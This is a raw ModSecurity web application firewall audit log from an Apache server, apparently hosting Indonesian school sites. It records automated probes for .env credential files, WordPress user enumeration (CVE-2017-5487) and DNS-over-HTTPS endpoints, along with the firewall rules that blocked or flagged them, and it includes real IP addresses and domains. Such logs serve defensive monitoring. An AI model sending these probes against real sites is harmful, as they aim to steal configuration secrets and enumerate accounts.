Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --856dba18-Z-- --53a2244b-A-- [11/Jun/2025:15:32:31 +0700] aEk_H1Z8bXZTkbagOrDdNAAAABI 103.236.140.4 59996 103.236.140.4 8181 --53a2244b-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --53a2244b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a2244b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630751572084 699 (- - -) Stopwatch2: 1749630751572084 699; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a2244b-Z-- --28771c39-A-- [11/Jun/2025:15:40:37 +0700] aElBBZKj8lJYHQZ0EnfZRAAAAIk 103.236.140.4 60090 103.236.140.4 8181 --28771c39-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.63.243.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.63.243.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --28771c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28771c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749631237782495 2856 (- - -) Stopwatch2: 1749631237782495 2856; combined=1222, p1=434, p2=760, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28771c39-Z-- --10c4fc57-A-- [11/Jun/2025:16:06:00 +0700] aElG-JKj8lJYHQZ0EnfZYAAAAIc 103.236.140.4 60334 103.236.140.4 8181 --10c4fc57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.236.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.236.183 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --10c4fc57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10c4fc57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749632760319748 819 (- - -) Stopwatch2: 1749632760319748 819; combined=325, p1=290, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10c4fc57-Z-- --3a741654-A-- [11/Jun/2025:16:06:00 +0700] aElG-GHSTY1pa5XXpU03mgAAAEs 103.236.140.4 60338 103.236.140.4 8181 --3a741654-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.236.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.236.183 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3a741654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a741654-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749632760725495 21846 (- - -) Stopwatch2: 1749632760725495 21846; combined=42628, p1=217, p2=0, p3=0, p4=0, p5=21219, sr=66, sw=0, l=0, gc=21192 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a741654-Z-- --46a85511-A-- [11/Jun/2025:16:18:15 +0700] aElJ15Kj8lJYHQZ0EnfZbAAAAIs 103.236.140.4 60474 103.236.140.4 8181 --46a85511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 112.215.192.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.215.192.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46a85511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46a85511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749633495554375 3263 (- - -) Stopwatch2: 1749633495554375 3263; combined=1296, p1=440, p2=823, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46a85511-Z-- --f88a3827-A-- [11/Jun/2025:16:19:46 +0700] aElKMpKj8lJYHQZ0EnfZcAAAAIU 103.236.140.4 60492 103.236.140.4 8181 --f88a3827-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --f88a3827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f88a3827-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749633586817561 898 (- - -) Stopwatch2: 1749633586817561 898; combined=381, p1=348, p2=0, p3=0, p4=0, p5=33, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f88a3827-Z-- --c4419e05-A-- [11/Jun/2025:16:39:37 +0700] aElO2QI48YPcPeAOw9tQhgAAAAU 103.236.140.4 60706 103.236.140.4 8181 --c4419e05-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.193.181.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.193.181.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4419e05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4419e05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749634777472004 3184 (- - -) Stopwatch2: 1749634777472004 3184; combined=1560, p1=528, p2=991, p3=0, p4=0, p5=40, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4419e05-Z-- --91d3d748-A-- [11/Jun/2025:16:48:34 +0700] aElQ8gI48YPcPeAOw9tQkgAAAAM 103.236.140.4 60784 103.236.140.4 8181 --91d3d748-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; CAM-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --91d3d748-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91d3d748-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749635314937140 28437 (- - -) Stopwatch2: 1749635314937140 28437; combined=55096, p1=318, p2=0, p3=0, p4=0, p5=27408, sr=93, sw=0, l=0, gc=27370 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91d3d748-Z-- --8fc93d25-A-- [11/Jun/2025:17:09:13 +0700] aElVyW7bf2YTFvcEXPuJFwAAAE8 103.236.140.4 34620 103.236.140.4 8181 --8fc93d25-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.248.135 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.248.135 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8fc93d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fc93d25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749636553158434 866 (- - -) Stopwatch2: 1749636553158434 866; combined=407, p1=369, p2=0, p3=0, p4=0, p5=38, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fc93d25-Z-- --52a0a371-A-- [11/Jun/2025:17:23:58 +0700] aElZPtDFbATf6vJlOUt6ggAAAJI 103.236.140.4 37330 103.236.140.4 8181 --52a0a371-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52a0a371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a0a371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749637438550140 3370 (- - -) Stopwatch2: 1749637438550140 3370; combined=1356, p1=461, p2=862, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a0a371-Z-- --a2bcb879-A-- [11/Jun/2025:17:32:21 +0700] aElbNZP8TulJ-kfHNvEE4wAAAMg 103.236.140.4 40964 103.236.140.4 8181 --a2bcb879-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.100.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.100.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2bcb879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2bcb879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749637941707495 3187 (- - -) Stopwatch2: 1749637941707495 3187; combined=1294, p1=439, p2=825, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2bcb879-Z-- --5c1ede37-A-- [11/Jun/2025:18:04:13 +0700] aElirZP8TulJ-kfHNvEFHQAAANY 103.236.140.4 41266 103.236.140.4 8181 --5c1ede37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.231.78.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.231.78.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5c1ede37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c1ede37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749639853182227 3155 (- - -) Stopwatch2: 1749639853182227 3155; combined=1396, p1=466, p2=898, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c1ede37-Z-- --f6f94c47-A-- [11/Jun/2025:18:13:12 +0700] aElkyJP8TulJ-kfHNvEFLAAAANU 103.236.140.4 41340 103.236.140.4 8181 --f6f94c47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 78.187.58.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.187.58.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f6f94c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6f94c47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749640392145332 3046 (- - -) Stopwatch2: 1749640392145332 3046; combined=1354, p1=449, p2=875, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6f94c47-Z-- --21d7973b-A-- [11/Jun/2025:19:30:17 +0700] aEl22ZP8TulJ-kfHNvEFcwAAAMc 103.236.140.4 42240 103.236.140.4 8181 --21d7973b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 Accept-Charset: utf-8 --21d7973b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d7973b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749645017729369 753 (- - -) Stopwatch2: 1749645017729369 753; combined=302, p1=264, p2=0, p3=0, p4=0, p5=37, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d7973b-Z-- --5c7f4276-A-- [11/Jun/2025:19:42:39 +0700] aEl5vwI48YPcPeAOw9tTxQAAABE 103.236.140.4 42358 103.236.140.4 8181 --5c7f4276-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --5c7f4276-C-- çÉexamplecom --5c7f4276-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c7f4276-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645759238914 3572 (- - -) Stopwatch2: 1749645759238914 3572; combined=2280, p1=544, p2=1650, p3=28, p4=30, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c7f4276-Z-- --bda79436-A-- [11/Jun/2025:19:42:39 +0700] aEl5vwI48YPcPeAOw9tTxwAAABM 103.236.140.4 42364 103.236.140.4 8181 --bda79436-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --bda79436-C-- ´!examplecom --bda79436-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bda79436-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645759761102 2918 (- - -) Stopwatch2: 1749645759761102 2918; combined=2073, p1=439, p2=1565, p3=21, p4=23, p5=25, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bda79436-Z-- --71b51f62-A-- [11/Jun/2025:19:42:41 +0700] aEl5wQI48YPcPeAOw9tTygAAABU 103.236.140.4 42370 103.236.140.4 8181 --71b51f62-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --71b51f62-C-- ™examplecom --71b51f62-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --71b51f62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645761869448 2670 (- - -) Stopwatch2: 1749645761869448 2670; combined=1790, p1=399, p2=1324, p3=21, p4=22, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71b51f62-Z-- --a02d4728-A-- [11/Jun/2025:19:42:42 +0700] aEl5wgI48YPcPeAOw9tTzQAAABY 103.236.140.4 42376 103.236.140.4 8181 --a02d4728-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a02d4728-C-- BCexamplecom --a02d4728-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a02d4728-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645762391487 1993 (- - -) Stopwatch2: 1749645762391487 1993; combined=1245, p1=283, p2=920, p3=13, p4=14, p5=15, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
